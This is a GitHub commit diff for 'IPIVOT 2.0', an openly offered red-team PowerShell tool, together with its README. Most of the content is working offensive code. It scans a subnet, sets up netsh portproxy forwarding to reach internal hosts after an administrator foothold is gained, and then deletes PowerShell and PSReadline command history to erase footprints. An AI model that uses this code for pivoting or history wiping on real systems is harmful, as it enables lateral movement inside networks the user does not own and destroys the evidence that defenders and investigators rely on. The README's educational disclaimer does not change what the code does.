Skip to content

Commit

Permalink
Merge pull request #2 from fort3/Dev
Browse files Browse the repository at this point in the history 
Dev
  • Loading branch information
@fort3
fort3 authored Dec 8, 2024
2 parents 95e8b6c + 977b685 commit 3821a62
Show file tree
Hide file tree
Showing 2 changed files with 146 additions and 57 deletions.
158 changes: 116 additions & 42 deletions Ipivot.ps1
View file
Original file line number Diff line number Diff line change
@@ -1,3 +1,27 @@
<#
.PARAMETER ConnectingPort
Change this to the connecting port
.PARAMETER ListeningPort
Change this to the listening port
.PARAMETER ListeningAddress
Change this to the listening IP address you want to set the forwarding to
.PARAMETER Network
Change this to the target network you're working on i.e 192.168.0
.PARAMETER HostRange
Change this to determine the range or leave as default depending on your needs
#>
param (
[int]$ConnectingPort = 9080,
[int]$ListeningPort = 9999,
[string]$ListeningAddress = '127.0.0.1',
[string]$Network = '192.168.0',
[int[]]$HostRange = 1..2
)

Write-Output "
****************************************************************************
# # # # # # #
Expand All @@ -14,61 +38,111 @@ Write-Output "
# # # # # # ## # # # #
## # # # #
## # # # #
## ####
IPIVOT - Red Teaming Tool
## #### 2.0
IPIVOT 2.0 - Red Teaming Tool
By: @fort3 - Fortune Sam Okon
@TrimarcJake - Jake Hildreth
Description: A little pivoting tool for when your favourite meterpreter shell fails...
Prequisites: Identify and Gain Initial Foothold on Target as Administrator
PS: If you happen to find this tool useful then I wouldn't mind a mention ;)
*******************************************************************************
"

#Change this to the connecting port
$Conport = (9080)

#Change this to the listening port
$LisPort = (9999)

#Change this to the listening IP address you want to set the forwarding to
$LisAddr = "127.0.0.1"

#Change this to the target network you're working on i.e 192.168.0
$network = "127.0.0"

#Change this to determine the range or leave as default depending on your needs
$range = 1..10

$ErrorActionPreference= 'silentlycontinue'

#list the network and ports found and apply the forwarding
$(Foreach ($add in $range)
{
$ip = "{0}.{1}" -F $network,$add
Write-Progress "Scanning Network" $ip -PercentComplete (($add/$range.Count)*100)
If(Test-Connection -BufferSize 32 -Count 1 -quiet -ComputerName $ip)
{
$socket = new-object System.Net.Sockets.TcpClient($ip, $Conport)
If($socket.Connected)
{ "$ip port $Conport is open"
Write-Progress "Forwarding from listening $LisAddr and $LisPort to target\n"
Write-Output "Forwarding from listening $LisAddr and $LisPort to target......."
$i = 1
foreach ($HostAddress in $HostRange) {
$ip = "{0}.{1}" -f $network, $HostAddress
Write-Progress "Scanning Network" $ip -PercentComplete (($i / $HostRange.Count) * 100)
If (Test-Connection -BufferSize 32 -Count 1 -quiet -ComputerName $ip) {
$socket = new-object System.Net.Sockets.TcpClient($ip, $ConnectingPort)
If ($socket.Connected) {
"$ip port $ConnectingPort is open"
Write-Progress "Forwarding from listening ${ListeningAddress}:$ListeningPort to target\n"
Write-Output "Forwarding from listening ${ListeningAddress}:$ListeningPort to target......."

Write-Output "____________________________________________________________________________________________________________________________"
#piece of the script that does the forwarding
Invoke-Expression "netsh interface portproxy add v4tov4 listenaddress=$($LisAddr) listenport=$($LisPort) connectaddress=$($ip) connectport=$($Conport)"
Write-Output "____________________________________________________________________________________________________________________________"

#piece of the script that does the forwarding
try {
Invoke-Expression "netsh interface portproxy add v4tov4 listenaddress=$($ListeningAddress) listenport=$($ListeningPort) connectaddress=$($ip) connectport=$($ConnectingPort)"
} catch {
Write-Warning "Could not forward ${ListeningAddress}:$ListeningPort to target......."
}
Write-Progress "Checking if host is listening on port $ListeningPort and $ConnectingPort`n"
Write-Output "Checking if host is listening on port $ListeningPort and $ConnectingPort"

Write-Progress "Checking if host is listening on port $LisPort and $ConPort\n"
Write-Output "Checking if host is listening on port $LisPort and $ConPort"
#verify that the port is listening
Get-NetTCPConnection -LocalPort $LisPort
Get-NetTCPConnection -LocalPort $ConPort
Write-Output "***************************************************************************************************************************"
#verify that the port is listening
Get-NetTCPConnection -LocalPort $ListeningPort
Get-NetTCPConnection -LocalPort $ConnectingPort
Write-Output "***************************************************************************************************************************"
$socket.Close()
} else {
"$ip port $ConnectingPort is not open "

}
else
}
}

Write-Output "***************************************************************************************************************************"
Write-Progress "Now clearing command history and footprints from powershell saved sessions......."
Write-Output "Now clearing command history and footprints from powershell saved sessions......."

#Clears the command history, including the saved-to-file history, if applicable.
#CAUTION!!! As this is a high impact activity, you will asked to confirm this action
function Clear-SavedHistory {
[CmdletBinding(ConfirmImpact='High', SupportsShouldProcess)]
param(
)
$havePSReadline = ($null -ne (Get-Module -EA SilentlyContinue PSReadline))
Write-Verbose "PSReadline present: $havePSReadline"
$target = if ($havePSReadline)
{
"entire command history, including from previous sessions"
}
else
{
"command history"
}
if (-not $pscmdlet.ShouldProcess($target))
{
return
}

if ($havePSReadline)
{
Clear-Host

# Remove PSReadline's saved-history file.Get-History
if (Test-Path (Get-PSReadlineOption).HistorySavePath)
{
"$ip port $Conport is not open "
# Abort, if the file for some reason cannot be removed.
Remove-Item -EA Stop (Get-PSReadlineOption).HistorySavePath

# To be safe, we recreate the file (empty).
$null = New-Item -Type File -Path (Get-PSReadlineOption).HistorySavePath
}
}
})

# Clear PowerShell's own history
Clear-History

# Clear PSReadline's *session* history.
[Microsoft.PowerShell.PSConsoleReadLine]::ClearHistory()
}
else
{ # Without PSReadline, we only have a *session* history.
Clear-Host
# Clear the doskey library's buffer, used pre-PSReadline.
# !! Unfortunately, this requires sending key combination Alt+F7.
# Thanks, https://stackoverflow.com/a/13257933/45375
$null = [system.reflection.assembly]::loadwithpartialname("System.Windows.Forms")
[System.Windows.Forms.SendKeys]::Sendwait('%{F7 2}')

# Clear PowerShell's own history
Clear-History
}
}

Clear-SavedHistory
45 changes: 30 additions & 15 deletions README.md
View file
Original file line number Diff line number Diff line change
@@ -1,5 +1,5 @@
# Ipivot
# # # # # # #
# # # # # # #
# # # # # # #
# #
# #
Expand All @@ -13,42 +13,57 @@
# # # # # # ## # # # #
## # # # #
## # # # #
## ####
IPIVOT - Red Teaming Tool
## #### 2.0
IPIVOT 2.0 - Red Teaming Tool
By: @fort3 - Fortune Sam Okon
@TrimarcJake - Jake Hildreth
Description: A little pivoting tool for when your favourite meterpreter shell fails...
Prequisites: Identify and Gain Initial Foothold on Target as Administrator
Addition: Creates a scheduled task to clear the command history in PSReadLine\ConsoleHost_history.txt

PS: If you happen to find this tool useful then I wouldn't mind a mention ;)

Instructions for use
## Instructions for use

Change the Parameters below depending on your needs:

PARAMETER ConnectingPort
#Change this to the connecting port
$Conport = (9080)

PARAMETER ListeningPort
#Change this to the listening port
$LisPort = (9999)

PARAMETER ListeningAddress
#Change this to the listening IP address you want to set the forwarding to
$LisAddr = "127.0.0.1"

PARAMETER Network
#Change this to the target network you're working on i.e 192.168.0
$network = "127.0.0"

#Change this to determine the network range or leave as default depending on your needs
$range = 1..10
PARAMETER HostRange
#Change this to determine the range or leave as default depending on your needs

# Script execution example
.\Ipivot.ps1 -ConnectingPort 9080 -ListeningPort 9999 -Network 127.0.0 -ListeningAddress 127.0.0.1 -HostRange (1..200)


# For Errors like below:

![image](https://github.com/user-attachments/assets/f6e6d43b-e397-43e9-b617-0db74ff1cb89)

#Enter the command below in the Powershell CLI
Set-ExecutionPolicy RemoteSigned -Scope Process
# Enter the command below in the Powershell CLI
Set-ExecutionPolicy RemoteSigned -Scope Process

# Example Output:
![image](https://github.com/user-attachments/assets/2c45cd1f-0415-46b4-b686-5c3a7100fee9)
![Ipivot 2 0_Parameters_5](https://github.com/user-attachments/assets/5b4c8f14-a16f-451f-afcb-560a5cb6a313)


# CAUTION
As this tool performs a high impact action like clearing the command history and PSReadline sessions and file, you will be asked to confirm this action with a prompt.
![Ipivot 2 0_Parameters_3](https://github.com/user-attachments/assets/2acd0d89-770d-4b24-9033-3299b5c5b044)

DISCLAIMER: Thoughts, Opinions and the Information in this script is strictly for educational purposes alone and use of any code or technique for unlawful or unauthorized activities is strictly prohibited.

This project is free to use!!

Would appreciate some feedback ;)
Would appreciate some feedback though ;)

0 comments on commit 3821a62

Please sign in to comment.